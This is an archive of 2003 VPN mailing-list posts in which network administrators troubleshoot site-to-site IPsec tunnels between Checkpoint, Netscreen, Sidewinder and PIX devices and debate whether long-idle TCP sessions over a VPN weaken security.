From jsanders at teklinks.com Tue Apr 1 14:14:27 2003
From: jsanders at teklinks.com (Jeremy Sanders)
Date: Tue, 01 Apr 2003 13:14:27 -0600
Subject: [VPN] VPN 3005 connected to Checkpoint

We're having a problem getting a tunnel up between a 3005 and a Checkpoint. I can't get the 3005 to try to initiate the connection. It's not even trying to establish phase 1. Any ideas? We've got the correct IP addresses and all of that information. It just won't even try to establish, even when we ping through it towards the remote network. Any ideas?

Jeremy Sanders, CCNP RHCE CNE
Senior Systems Engineer
Teklinks, Inc.
205-249-5988

From shannong at texas.net Tue Apr 1 21:39:49 2003
From: shannong at texas.net (shannong)
Date: Tue, 1 Apr 2003 20:39:49 -0600
Subject: [VPN] Use of VPN
Message-ID: <002c01c2f8c1$26917a40$0101a8c0@ASTEROID>

BTW... the PIX can do inbound user authentication before allowing a user access to a resource. Therefore, you could create public access IPs for the web server/s and configure the PIX to authenticate inbound web sessions. SSL would provide encryption, of course. The Internet at large would not have access to the servers, but rather only those users with valid credentials verified via RADIUS/TACACS+. This is much easier than providing and supporting VPN access for web servers.

-----Original Message-----
From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Bruce.CTR.Aron at faa.gov
Sent: Thursday, September 05, 2002 11:55 AM
To: Kejvan Redjamand
Cc: vpn at lists.shmoo.com
Subject: Re: [VPN] Use of VPN

The app is on the company Intranet (internal Web), so people outside the company normally can't see or use the app. But in selected cases, the company wants selected people to be able to get to the app but nothing else on the Intranet. A complicating factor is that the company Intranet is not on one Web server -- there are multiple Web servers in multiple geographical locations. So a Web server access list wouldn't help much either. And people may be using AOL or similar that don't have a static IP address for the client/user.

Bruce

Kejvan Redjamand
cc: vpn at lists.shmoo.com
Subject: Re: [VPN] Use of VPN
09/05/2002 01:47 PM

Hi

It seems that it may be done by CGI, ASP, .. on a webserver with access restrictions. Why use VPN if web based?

Kejv

On Thu, 5 Sep 2002 Bruce.CTR.Aron at faa.gov wrote:

> Subject: [VPN] Use of VPN
>
> I have one basic question -- is it possible to use VPN such that the remote
> user has access to only one server (IP address) rather than everything on
> the company intranet?
>
> The specific situation I am looking at is how best to allow "trusted"
> non-company people to get inside the company intranet to access one
> specific Web-based program and yet not let them get at the rest of the
> company intranet.
>
_______________________________________________
VPN mailing list
VPN at lists.shmoo.com
http://lists.shmoo.com/mailman/listinfo/vpn

From jaime.leon at motorola.com Tue Apr 1 22:43:11 2003
From: jaime.leon at motorola.com (Leon Jaime-AJL080)
Date: Tue, 1 Apr 2003 21:43:11 -0600
Subject: [VPN] Cisco VPN 5000 client on Linux

Guys, has anyone experienced issues while installing the Cisco VPN client on a Linux machine and using NAT? Authentication works and I see the IP being assigned to the machine, but that's it; it cannot be reached afterwards. I have already set up the NAT in the vpn_config file. Any feedback will be highly appreciated.

Thanks
Jaime R.
Leon
iDEN Market System Engineer - Motorola Mexico
Desk/Mobile: (5255)-5261 6944 / (5255)-1992 9070
Two-Way: bidir.5519929070 at msgnextel.com.mx
Private ID: 1 * 2233

From Tim.Kokes at AugustTech.com Wed Apr 2 10:12:53 2003
From: Tim.Kokes at AugustTech.com (Kokes, Tim)
Date: Wed, 2 Apr 2003 09:12:53 -0600
Subject: [VPN] VPN tunnel between Sidewinder 5.2.1.0.7 and Netscreen 5XP

Has anyone configured a site-to-site VPN tunnel between a Sidewinder 5.2.1.0.7 and a Netscreen 5XP? I've set up both peers and the SA does not like the way the Netscreen is formatting the VPN communication.

Setup taken:

NETSCREEN:
VPN Tunnel:
  Gateway = YYY.YYY.YYY.YYY
  Static IP: XXX.XXX.XXX.XXX
  "Aggressive"
  Phase1 proposal = 3DES, SHA1, DH2 (pre-g2-3des-sha)
  pre-share = XXXXXX
AutoIKE:
  Name = NT1-FW2
  Remote gateway = FW2
  Phase2 proposal = 3DES, SHA1, DH2, (nopfs-esp-3des-sha)
Policy:
  NAME: NT1-FW2
  Source, JAMACA (172.20.100.0)
  Destination, BLM.Corp (10.10.0.0)
  Service, ANY
  NAT, OFF
  Action, Tunnel
  "Check modify incoming VPN policy"

SIDEWINDER:
SA Netscreen-DSL-PRESHARE
  Local subnet = 10.10.0.0 /16
  Remote = 172.20.100.0 /24
VPN Tunnel:
  Pre-Share Secret = XXXXXXX
  Accept = 3DES - SHA1
  Phase1 = 28800 TTL 3DES, SHA1, DH2
  Phase2 = 3600 TTL 3DES, SHA1,

From Mike.Hancock at sourcemed.net Wed Apr 2 10:24:24 2003
From: Mike.Hancock at sourcemed.net (Mike Hancock)
Date: Wed, 2 Apr 2003 09:24:24 -0600
Subject: [VPN] Application timeouts over VPN...HELP!

We have a good and solid VPN between a Checkpoint and a NetScreen; it's up and solid. I can send 100 pings and get 100% response. Ping times across the tunnel are 63ms average. The developers for each company keep saying that the "firewall" is dropping the packets. And it is.

Application A starts the session (SYN), App B answers (SYN-ACK), App A (ACK)... no problem. The apps even talk out to the correct DST ports. The problem comes when App A tries to send info over the established session (example src port 2565) but sends it out 65 seconds since the last communication; the firewalls time out the session and App A should resend over a new source port. It never does. It will try till its dying days to communicate over that FIRST session.

I am a router/firewall guy and not a programmer; is there anything that I can do to lessen the problem from a firewall/VPN point of view? I keep saying that they need to speed up response times on their TCP communications and send "heartbeats". They call me "Non-Helpful". I just want to fix it. Any ideas?

App A -----------------Checkpoint========INTERNET===========NetScreen----------------App B

_______________________________
Mike

From alex at cipherica.com Wed Apr 2 13:33:39 2003
From: alex at cipherica.com (Alex Pankratov)
Date: Wed, 02 Apr 2003 10:33:39 -0800
Subject: [VPN] Application timeouts over VPN...HELP!
Message-ID: <3E8B2D03.9010308@cipherica.com>

Mike Hancock wrote:

> We have a good and solid VPN between a Checkpoint and a NetScreen, its
> up and solid. I can send 100 pings and get 100% response. Ping times
> across the tunnel are 63ms average. The developers for each company
> keep saying that the "firewall" is dropping the packets. And it is.
> Application A starts the session(syn), App B answers(synack), App
> A(ack)....no problem. The apps even talks out to the correct DST ports.
> Problem comes when App A tries to send info over the established session
> (example src port 2565) but sends it out 65 seconds since the last
> communications, the firewalls time out the session and App A should
> resend over a new source port. It never does.
> It will try till its dying
> days to communicate over that FIRST session.

Regardless of the respective position of the VPN terminator and the firewall, the problem is clearly in the firewall setup. I'm not an admin, so I'll leave troubleshooting to other people :) But ..

> I am a router firewall guy and not a programmer, is there anything that
> I can do to lessen the problem from a firewall/VPN point of view? I keep
> saying that they need to speed up response times on their TCP
> communications and send "heartbeats". They call me "Non-Helpful"

.. being a programmer myself I can comment on this though. Using application-level heartbeats to keep alive a *TCP* connection is not a good idea for a number of reasons. One of them is an inability to guarantee heartbeat intervals even with 10-sec precision (caused in part by traffic shaping and QoS-misbehaved routers), which renders the whole idea useless.

/alex

From dklein at netscreen.com Wed Apr 2 13:33:56 2003
From: dklein at netscreen.com (David Klein)
Date: Wed, 2 Apr 2003 10:33:56 -0800
Subject: [VPN] VPN tunnel between Sidewinder 5.2.1.0.7 and Netscreen 5XP
Message-ID: <541402FFDC56DA499E7E13329ABFEA87C6C374@SARATOGA.netscreen.com>

On the Netscreen, does "get log event" show the reason for the IKE failure? You could also do a "debug ike basic" to find the problem. A couple of things to look for based on your information below:

1) "Aggressive"
   Do you have aggressive mode set up on the Sidewinder? Either change the Sidewinder to Aggressive mode or the Netscreen to Main mode for P1.

2) Source, JAMACA (172.20.100.0)
   Destination, BLM.Corp (10.10.0.0)
   Are the subnet masks correct on these? /24 and /16 respectively. Mismatched IP addresses and subnets will cause IKE P2 proxy-id checks to fail.

3) Phase2 proposal = 3DES, SHA1, DH2, (nopfs-esp-3des-sha)
   This doesn't make sense. You've selected "nopfs" yet you mention DH2, which means you want to do PFS. Make sure these match between the two boxes.

Dave Klein
Netscreen Systems Engineer

-----Original Message-----
From: Kokes, Tim [mailto:Tim.Kokes at AugustTech.com]
Sent: Wednesday, April 02, 2003 9:13 AM
To: vpn at lists.shmoo.com
Subject: [VPN] VPN tunnel between Sidewinder 5.2.1.0.7 and Netscreen 5XP

Has anyone configured a site-to-site VPN tunnel between a Sidewinder 5.2.1.0.7 and a Netscreen 5XP? I've set up both peers and the SA does not like the way the Netscreen is formatting the VPN communication.

Setup taken:

NETSCREEN:
VPN Tunnel:
  Gateway = YYY.YYY.YYY.YYY
  Static IP: XXX.XXX.XXX.XXX
  "Aggressive"
  Phase1 proposal = 3DES, SHA1, DH2 (pre-g2-3des-sha)
  pre-share = XXXXXX
AutoIKE:
  Name = NT1-FW2
  Remote gateway = FW2
  Phase2 proposal = 3DES, SHA1, DH2, (nopfs-esp-3des-sha)
Policy:
  NAME: NT1-FW2
  Source, JAMACA (172.20.100.0)
  Destination, BLM.Corp (10.10.0.0)
  Service, ANY
  NAT, OFF
  Action, Tunnel
  "Check modify incoming VPN policy"

SIDEWINDER:
SA Netscreen-DSL-PRESHARE
  Local subnet = 10.10.0.0 /16
  Remote = 172.20.100.0 /24
VPN Tunnel:
  Pre-Share Secret = XXXXXXX
  Accept = 3DES - SHA1
  Phase1 = 28800 TTL 3DES, SHA1, DH2
  Phase2 = 3600 TTL 3DES, SHA1,

From puja.puri at cdac.ernet.in Wed Apr 2 23:37:02 2003
From: puja.puri at cdac.ernet.in (puja)
Date: Thu, 03 Apr 2003 10:07:02 +0530
Subject: [VPN] End to End VPNs and iterated tunnels
Message-ID: <3E8BBA6E.2020002@cdac.ernet.in>

hello list

I have an IPSec implementation with me. I am trying to set up an End-to-End VPN. The scenario is like this:

C1---------G1==================G2---------C2

I want to set up ESP tunnel mode between G1 and G2 and AH transport between C1 and C2, at the same time. (Both these policies are currently working independently but not working when configured together.) How should the configuration be done in this scenario?
Does the gateway need to know that the clients are doing some IPSec processing?

Thanks in advance
Regards
Puja Puri

From safieradam at hotmail.com Wed Apr 2 14:00:02 2003
From: safieradam at hotmail.com (safieradam)
Date: Wed, 2 Apr 2003 14:00:02 -0500
Subject: [VPN] VPN and FW separated or integrated ?
References: <20030331143046.88870.qmail@web21405.mail.yahoo.com>

The VPN 3000 series is targeted at user-to-gateway VPN and has a good feature set in that respect. I've only seen the PIX used for site-to-site VPN. The VPN 3000 will let you set up access groups and, if you want, you can assign IP pools to the groups. The client seems to have an IP from the pool even though the ISP gave them something totally different. This allows internal firewalls/routers to filter the VPN users by IP pool if your resources are distributed by department/group. If all your servers are lumped on one subnet and you have minimal access control you can set up ACLs on the Cisco box itself. You can also track the user by the IP address throughout the internal network and, if you go to the trouble, your IDS alarms can be cross-referenced to the VPN log to identify the user ID that set off the alarms.

The GUI and command line commands are easy to use and you don't really need to know Cisco IOS. I set up a 3015 concentrator and Cisco clients to work with PKI and smart cards for authentication and suffered through only minor tech glitches. You also have Radius and Active Directory authentication options. However, you should be ready for Cisco to claim glitches are features and point the finger at everyone else until they have a scheduled upgrade release that may or may not fix the problem. Still, the stuff works well for the most part. You might also want to look at other products as mentioned by others.

To size your system, consider how many simultaneous users will be on at the same time and what your usage profile is going to be, i.e. 300 users can translate to 3 simultaneous users at any one time or to 300 VPN connections up 10 hrs/day simultaneously. Do you need to drop connections that are idle for x minutes for security/performance reasons or do you need to keep idle connections up for fast response? Do you do split tunneling (bad security) or do you have users go through your corporate proxy to surf the web (performance/capacity issues)? Try to profile the traffic as best you can, then develop some requirements, then look at products.

Finally, the brain dead French have legal limitations on VPN encryption strength, key escrow and generally an incompetent world security outlook. Check your local laws before doing much of anything in France.

Adam Safier

----- Original Message -----
From: "Rudi Pierquin"
Sent: Monday, March 31, 2003 9:30 AM
Subject: [VPN] VPN and FW separated or integrated ?

> Hi,
>
> We are currently looking to implement a homeworking
> solution for max 300 users. For this matter, i am
> wondering if any of you could tell me what is the
> benefit in buying separately VPN and firewall device.
> More specifically, comparing the Cisco VPN3000 box
> with the PIX firewall, can somebody tell me why should
> i use a VPN3000 box if a PIX535 with 6.3 software on
> it give me all the VPN and FW capabilities I could
> dream of ?
>
> Many thanks,
>
> Rudi
>

From safieradam at hotmail.com Thu Apr 3 10:13:27 2003
From: safieradam at hotmail.com (safieradam)
Date: Thu, 3 Apr 2003 10:13:27 -0500
Subject: [VPN] Application timeouts over VPN...HELP!

There is a timer for TCP in the FW 4.1 policy properties menu.
I think the default is 60 seconds but it may be 40. It's been a while. Anyway, you might change that so the firewall gives TCP sessions much longer to get established. I don't remember on Netscreen but it should also have a timeout option.

Also, try sending large pings just to make sure that still works (you are checking MTU size limits, just in case).

However, you should point out to the "developers" that if their application is to work on anything but the one link, especially over the internet with other companies, they need to fix it. Firewalls are becoming a networking fact of life and their application will always have problems unless they adopt and design for that fact now. They need to have error checking in their code and not go into endless loops. Your idea for a heartbeat is OK if they can't get the performance to improve, but the application had better be a batch job and not have user interaction. They may also need to control MTU size. Make sure they _don't_ set the do-not-fragment bit on.

Sounds to me like they are in a rush, don't have good network programming experience and are leaving error checking to be added on when they have time, at some future point that will never come. I would be concerned about what they are doing to make the application secure.

Adam Safier

----- Original Message -----
From: Mike Hancock
To: vpn at lists.shmoo.com
Sent: Wednesday, April 02, 2003 10:24 AM
Subject: [VPN] Application timeouts over VPN...HELP!

From hakan.palm at generic.se Thu Apr 3 16:37:28 2003
From: hakan.palm at generic.se (hakan.palm at generic.se)
Date: Thu, 3 Apr 2003 23:37:28 +0200
Subject: Re: [VPN] Application timeouts over VPN...HELP!

Mike,

have you tried tweaking the timers in the firewalls? Usually you can modify the idle time a firewall allows before considering a TCP session stale and closing it. I do believe you can change the relevant settings for FW-1 in the object.C file. I guess there's a spiffy knob somewhere in the GUI you can fiddle with otherwise...

HTH
/Palm

Mike.Hancock at sourcemed.net 2003-04-02 20:24
To: vpn at lists.shmoo.com @ INTERNET
Cc: (Blank: Hakan Palm/Generic)
Subject: [VPN] Application timeouts over VPN...HELP!

From Mike.Hancock at sourcemed.net Fri Apr 4 07:24:08 2003
From: Mike.Hancock at sourcemed.net (Mike Hancock)
Date: Fri, 4 Apr 2003 06:24:08 -0600
Subject: [VPN] Application timeouts over VPN...HELP!

We can reset the timers (a global setting in CP and NS) but sometimes the applications do not interact for a couple of hours and I had rather not make sessions viable for hours at a time.

Mike

-----Original Message-----
From: safieradam [mailto:safieradam at hotmail.com]
Sent: Thursday, April 03, 2003 9:13 AM
To: Mike Hancock; vpn at lists.shmoo.com
Subject: Re: [VPN] Application timeouts over VPN...HELP!

From rrsarge at medclinic.net Fri Apr 4 13:45:41 2003
From: rrsarge at medclinic.net (Randy Sargent)
Date: Fri, 4 Apr 2003 12:45:41 -0600
Subject: [VPN] Decapsulated packet does not match tunnel id

SEF 7.0/Win2K PRO/SP2

I have one particular tunnel with a SonicWALL SOHO2 that is giving me fits. It will work fine for a little while and then I get this:

IP packet dropped (192.168.10.78->10.0.0.3: Protocol=TCP[SYN] Port 4802->80): Decapsulated packet does not match tunnel id 6.isakmp.1414 at xxx.xxx.xxx.xxx

This is driving me nuts! Has anyone seen this before?

Randy Sargent

From safieradam at hotmail.com Sat Apr 5 18:44:09 2003
From: safieradam at hotmail.com (safieradam)
Date: Sat, 5 Apr 2003 18:44:09 -0500
Subject: [VPN] Application timeouts over VPN...HELP!

The 65 seconds in your original method is one thing. Keeping the session up and idle for hours is a big difference. I would whip out the "New" security policy and point out to the developers that leaving sessions open for hours is bad security and not allowed. If you are not in charge of security policy, get the policy person on your side and have them talk to the developers. This is really a political negotiation but your instinct not to allow it is correct.

Adam Safier

----- Original Message -----
From: Mike Hancock
To: safieradam ; vpn at lists.shmoo.com
Sent: Friday, April 04, 2003 7:24 AM
Subject: RE: [VPN] Application timeouts over VPN...HELP!

From tbird at precision-guesswork.com Sat Apr 5 19:51:12 2003
From: tbird at precision-guesswork.com (Tina Bird)
Date: Sun, 6 Apr 2003 00:51:12 +0000 (GMT)
Subject: [VPN] X*X*X administrivia
Message-ID: <20030406004624.L3623-100000@sisyphus.iocaine.com>

*sigh* many list members' mail servers have bounced this message due to its offensive content.
now, i find failed security associations as offensive as the next person, maybe even more offensive than the next person, but i don't think they're worth bouncing emails due to content filtering ;-)

two points:

1) if you want to hide IP addresses, choosing masks other than x-x-x is probably a good idea if you don't want to trigger this sort of problem

2) management retains the right to arbitrarily unsubscribe list members whose mail servers send me excessive numbers of bounce messages (where excessive is defined by, oh, the kind of week i've had at work)

back to regular programming -- tbird

--
"I knew it! I knew it! Well, not in the sense of having the slightest idea, but I knew there was something I didn't know." -- Willow, from "Buffy the Vampire Slayer"

http://www.shmoo.com/~tbird
Log Analysis http://www.loganalysis.org
VPN http://vpn.shmoo.com

---------- Forwarded message ----------
Date: Fri, 4 Apr 2003 12:45:41 -0600
From: Randy Sargent
To: "vpn at lists.shmoo.com"
Subject: [VPN] Decapsulated packet does not match tunnel id

SEF 7.0/Win2K PRO/SP2

I have one particular tunnel with a SonicWALL SOHO2 that is giving me fits. It will work fine for a little while and then I get this:

IP packet dropped (192.168.10.78->10.0.0.3: Protocol=TCP[SYN] Port 4802->80): Decapsulated packet does not match tunnel id 6.isakmp.1414 at xxx.xxx.xxx.xxx

This is driving me nuts! Has anyone seen this before?

Randy Sargent

From alex at cipherica.com Sat Apr 5 20:09:46 2003
From: alex at cipherica.com (Alex Pankratov)
Date: Sat, 05 Apr 2003 17:09:46 -0800
Subject: [VPN] Application timeouts over VPN...HELP!
Message-ID: <3E8F7E5A.2070401@cipherica.com>

safieradam wrote:

> The 65 seconds in your original method is one thing. Keeping the session
> up and idle for hours is a big difference. I would whip out the "New"
> security policy and point out to the developers that leaving sessions
> open for hours is bad security and not allowed.

Adam, can you explain why *exactly* it's "bad security"? Especially given that the TCP connection in question is IPsec'ed in the first place.

[snip]

> Adam Safier

[snip]

From aquamjb at mac.com Tue Apr 8 12:41:07 2003
From: aquamjb at mac.com (Michael Burns)
Date: Tue, 8 Apr 2003 09:41:07 -0700
Subject: [VPN] VPN help

Hi,

I am looking to find information to see if there is a VPN for the T-Mobile Sidekick (wireless mobile pager, more at Danger.com). The reason to have the VPN is that I could use it to communicate with my engineers within the division both in and out of campus. I am deaf and am usually working with highly sensitive projects which would require me to have secure access to my email or to the corporate website. This VPN would help a lot if there is a way to use it in a mobile wireless pager like the Sidekick.

Thanks, and I hope there is info that would apply to this wireless pager. Or you might know someone who could help me out? Or I can contact the Danger.com group to see what would work.

Michael Burns

From osmond at holburn.com Wed Apr 9 07:53:59 2003
From: osmond at holburn.com (Chad Osmond)
Date: Wed, 9 Apr 2003 07:53:59 -0400
Subject: [VPN] VPN help
Message-ID: <002f01c2fe8e$b66af830$1902a8c0@Polk>

> Am looking into to find information to see if there is VPN for the
> T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason
> to have the VPN is that I could use to communicate with my engineers
> within the division both in and out of campus. Am deaf and am usually
> working with highly sensitive projects which would require me to have
> secure access to my email or to corporate website. This VPN would
> greatly help lot if there is a way to use in the mobile wireless pager
> like the Sidekick.
>

Have you considered the iPAQ line?
The iPAQ 3970s are really nice; the next model up has WLAN access built in, with thumb-pad biometrics for security. There are many VPN clients for this device; use GPRS to get data back and forth when WLAN is unavailable. BlackBerry also rings a bell; their PIM device has access in most metro areas (but may not be encryptable; see RIM's site to see what they have). Considering that it is e-mail you need, in most cases it is transferred in plain text across the Internet (unless you're using encryption), so consider the weakest-link factor. From garry.rees at hall-woodhouse.co.uk Wed Apr 9 11:39:54 2003 From: garry.rees at hall-woodhouse.co.uk (Garry Rees) Date: Wed, 9 Apr 2003 16:39:54 +0100 Subject: [VPN] Ip addresses In-Reply-To: <20030409120005.46813.42133.Mailman@sisyphus.iocaine.com> Message-ID: <003101c2feae$45a1ee40$42010180@GarryWIN2000> I'm a novice, struggling at the moment to configure some laptops (for home use) with NetScreen-Remote and a NetScreen 25 firewall. I have got the connections working, i.e. I can VPN in to the company network from home via an ADSL connection, access Windows servers, Unix servers, run programs, download, upload etc., but am stuck with one thing. I want to print from a Unix box in the company to the home laptop. To do this I have to print to a specific IP address. I want to be able to give my laptop at home a specific IP address that can go through my firewall so that my Unix box can print to this IP address. At the moment I can log onto and ping the Unix box from home but cannot ping the home laptop from the Unix (or Windows) network when on site. I have tried (but don't fully understand) mapped and dynamic addresses and think I need policies, on incoming and outgoing, to route the print data from Unix out to the laptop. I can give my laptop a fixed IP address but cannot ping it from Unix or Windows even when I am VPN'd in and logged onto the server.
Any help would be appreciated as to what I am missing (apart from enough grey cells). GR
From rmalayter at bai.org Wed Apr 9 13:36:40 2003 From: rmalayter at bai.org (Ryan Malayter) Date: Wed, 9 Apr 2003 12:36:40 -0500 Subject: [VPN] Application timeouts over VPN...HELP! Message-ID: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> From: Alex Pankratov [mailto:alex at cipherica.com] >can you explain why *exactly* it's >a "bad security" ? Especially given >that the TCP connection in question >is IPsec'ed in first place. If the tunnel is left open, and the engineer's workstation is online and idle, the workstation becomes a vector for compromising the security of the encrypted traffic. If the workstation is unmanned, and the screen is accidentally left unlocked, someone could walk up and compromise the shared secret key by looking at the IPsec client settings. Or someone could walk up and hack the OS (many privilege-elevation hacks on Windows NT/2000/XP and other OSes require console access), or use a debugging tool to dump the memory and find the shared secrets or session keys. These attacks could be nearly as harmful as if the tunnel was down, since a remote-control backdoor or whatever could be installed, which could later be used to compromise encrypted traffic. However, if these attacks are made while the VPN is up, then devices on the other end of the VPN connection become ready and easy targets of opportunity for the attacker. (There are usually loose - if any - firewall rules applied to a VPN connection, so remote-compromise attacks would be much easier.) Now, if all devices at the endpoints of the VPN are physically secure, and properly firewalled, then you don't have to worry too much about idle tunnels being a security risk. In fact, I'd go so far as to say strong encryption is basically redundant on a VPN.
Even on a VPN with lowly single-DES encryption, hacking the endpoint workstations or servers (either remotely or physically) is likely to be an easier attack than breaking the VPN encryption. Regards, -ryan- From alex at cipherica.com Wed Apr 9 16:13:40 2003 From: alex at cipherica.com (Alex Pankratov) Date: Wed, 09 Apr 2003 13:13:40 -0700 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> Message-ID: <3E947EF4.8080701@cipherica.com> Ryan Malayter wrote: > From: Alex Pankratov [mailto:alex at cipherica.com] > >>can you explain why *exactly* it's >>a "bad security" ? Especially given >>that the TCP connection in question >>is IPsec'ed in first place. > > If the tunnel is left open, and the engineer's workstation is online and > idle, the workstation becomes a vector for compromising the security of > the encrypted traffic. That's not what I asked about. The question was how keeping *TCP sessions* open reduces overall VPN security. Let me rephrase it - which attacks mountable against VPNs would have a lesser chance of succeeding if all TCP connections are short-lived? > [bunch of unrelated to TCP question stuff snipped] From james at heague.com.au Thu Apr 10 02:19:43 2003 From: james at heague.com.au (James McNeill) Date: Thu, 10 Apr 2003 16:19:43 +1000 Subject: [VPN] Application timeouts over VPN...HELP! References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> Message-ID: <002d01c2ff29$2d39cd20$0f00a8c0@james> The more traffic that is exposed with the same key, the easier it will be to cryptanalyse and discover bad random-number-generating patterns. For any securely implemented encryption protocol, this should not be a problem. In most cases you either crack the encryption or you don't. It doesn't matter how much stuff you have to decrypt.
As for TCP sessions, since the keys and algorithms will all be the same between sessions, it won't have any effect on security. Anyone capable of attacking your VPN tunnel won't care what you do with your TCP sessions. As far as your attacker is concerned, a TCP session is just a number in the header, but so long as it uses the same tunnel, he won't care. It's the contents of the packet that is valuable. Having abnormally long/short TCP sessions is bad practice, and likely to cause more problems than it's worth. -James From safieradam at hotmail.com Thu Apr 10 07:43:50 2003 From: safieradam at hotmail.com (safieradam) Date: Thu, 10 Apr 2003 07:43:50 -0400 Subject: [VPN] Application timeouts over VPN...HELP! References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> Message-ID: Well said. This is the primary concern. In addition: 1) Complexity and audit - A minor benefit is added complexity for decryption attacks and an audit trail to pin-point attack times. A decryption attack needs some kind of identifiable data to know that it succeeded.
The session encryption is based on a symmetric key which is re-negotiated per SA policy timers. Often this is as long as 8-24 hrs but can be reset to shorter periods for improved security (I like 15 minutes for connections that are not very busy, longer if traffic volume is high and renegotiation creates too much overhead). The longer the session is open with a given symmetric key, the longer an attacker has to figure out the symmetric key, break into the session and hijack the TCP connection. While TCP connections can usually span multiple sessions, the attacker has a limited time to launch an attack before the session key changes. If there is no data flowing on an established connection the attacker can probe the end systems with a single packet and verify s/he really broke the code and is still in the same session. Most systems don't monitor or log existing open sessions for single packets. But attackers must initiate a new connection to test the key and session lifetime if the IP connection is down. Initiating a new connection sometimes leaves a mark in logs (what is your logging and monitoring policy?) and can help alert IDSs or wake operators that something is not kosher (why is the 2AM dump happening at 12, and why is it so short?). 2) Application authentication - In a well-written application the end points _should_ also re-authenticate with each TCP connection, preferably with something more secure than a plain password (I like digital signatures). The attacker must now wait and monitor for a new session before launching an attack, or might set off alarms during failed log-on attempts. (You do have a login-failure policy, right?) Even with reusable passwords the attack complexity increases - attackers have to have captured the initial log-in within the session with the broken key. 3) Session tear-down - Ideally VPN implementations tear down idle low-volume sessions when the last IP connection is ended.
The attacker now has to wait for another session, break the keys and try to launch an attack. Nobody likes a deadline - the length of the IP session. Sort of links to number 4 as well. Memory fades and it's been a while since I dug into the detail, but I think I saw at least one vendor establish a new session for every IP connection, and close the session with the ending of the IP connection. Might have been a side effect of the testing protocol. 4) Resources - Leaving a TCP session open takes up resources in the firewall, which must retain state information. (Tell the project leader to pony up an additional $100,000 for bigger firewall boxes if he must do this. At least it will improve your security budget if he falls for it.) 5) Dropped connections / QoS - Are quality of service, up time and disaster recovery security group concerns? A VPN Security Association (SA) has a session lifetime. My experience with inter-vendor VPN (as of testing 2+ years ago) is that most handle the session renegotiation OK, but some drop all connections when it's time to renegotiate the SA, especially with other vendors' VPN boxes. The IP state can be lost and the IP connection of a brain-dead application is henceforth blocked until a new IP session is started (by restarting the application? Ouch!). I believe this has improved with more recent releases and continued interop testing, so brain-dead applications can do better now. But since communication links are not stable the application had better handle it (what is your quality of service agreement, and will the developers pay for a 100% up-time guarantee? You could have some fun with this but remember, when you apply a new firewall policy/configuration you may be dropping connections). 6) Legacy security staff paranoia - In the good old days, when firewalls were just becoming available and VPN meant a multiplexed line, passwords were a main defense strategy. An open IP session was subject to hijacking without the need for the password.
Security people learned to raise the specter to justify our salary. The fear persists in our psyche even with VPN. 7) Bad programming - Lack of communication session robustness and disregard for system resources makes me question the quality of the software and the security awareness of the programmers. Being a former programmer, before the days of OOP, I understand the desire to get the basic code written and the avoidance of error-trapping code that adds so much overhead and time to a simple and otherwise short module. But sloppy and rushed programming with a "we'll fix that later" attitude is one reason why we have so many security holes in application software. 8) I'm sure I missed something. See 6. Adam Safier From lm at intrinsic.it Thu Apr 10 08:30:45 2003 From: lm at intrinsic.it (Luigi Mori) Date: Thu, 10 Apr 2003 14:30:45 +0200 Subject: [VPN] Ip addresses In-Reply-To: <003101c2feae$45a1ee40$42010180@GarryWIN2000> References: <003101c2feae$45a1ee40$42010180@GarryWIN2000> Message-ID: You can solve your problem using a route-based VPN. You can find the exact procedure in the ScreenOS 4.0 manual. Basically you have to create a tunnel interface bound to the untrust interface and assign a virtual IP address (not a VIP) to the laptop. Then you have to permit the LP traffic from the Unix server to the virtual address. lm From safieradam at hotmail.com Thu Apr 10 08:19:57 2003 From: safieradam at hotmail.com (safieradam) Date: Thu, 10 Apr 2003 08:19:57 -0400 Subject: [VPN] VPN help References: Message-ID: From what I can tell the danger.com service is offering the e-mail and other data services. That means they control encryption from their server to your hiptop PDA. You will need to work with them on whether the info is encrypted over the wireless link and on the security of their e-mail servers. It probably won't pass security policy muster, and VPN is probably NOT your solution if you use them for more than an IP link provider.
If they can simply provide a web link to your company site you might be able to put up a VPN solution, but it will probably take some custom coding on the client side. I would look at more commonly available existing PDA solutions. V-ONE (www.v-one.com) makes a proprietary VPN and claims to have a PDA client. They may be able to modify it to work with the Hiptop device, for a price or volume deal, and they are small enough to talk to and consider a new service provider as a partner. They also did work with some government groups a while back, so they may already have classification levels worked out. Some government security policies forbid certain data going over the Internet even via VPN, so check into that first. This is a proprietary OS (see FAQ) so you may need to work with the service vendor directly to find developers working on what you want. Adam Safier From russak at bps.org.uk Thu Apr 10 12:23:18 2003 From: russak at bps.org.uk (Russell Sakne) Date: Thu, 10 Apr 2003 17:23:18 +0100 Subject: [VPN] Cannot find domain controller Message-ID: Hi all, I hope you can help. Having followed the advice of the very helpful people on this list, we had our remote site with its PIX-to-PIX VPN working fine, using WINS to find network resources here at home base. Then "something happened" and the remote machines can no longer find any domain controllers for our domain. They can connect to other servers (including our Terminal Services machine and our web proxy), but the primary machines they *need* to connect to are a PDC and a BDC and they can't see them at all. Weirdly, a "find" on the other BDC *does* get a result, which suggests they should be able to approach that machine for authentication. I've checked their DNS settings haven't changed, and "ping" tests resolve the correct IP addresses (though we've never been able to get an ICMP packet through either PIX in any circumstances...). We wondered if the machine accounts down there had somehow managed to expire, so have deleted them from the domain and then attempted both to create them via a workstation rename/rejoin and manually to allow the workstation to reconnect under that name, to no avail. Can anyone offer any clues or informed speculation as to what might have gone wrong? We're wondering about the nature of an NT4 "Where's a DC" call. Is there some setting on the VPN that would refuse passage to such a multicast-thing which we may have inadvertently set? Hopefully yours RussellS From alex at cipherica.com Thu Apr 10 12:29:51 2003 From: alex at cipherica.com (Alex Pankratov) Date: Thu, 10 Apr 2003 09:29:51 -0700 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: <002d01c2ff29$2d39cd20$0f00a8c0@james> References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> <002d01c2ff29$2d39cd20$0f00a8c0@james> Message-ID: 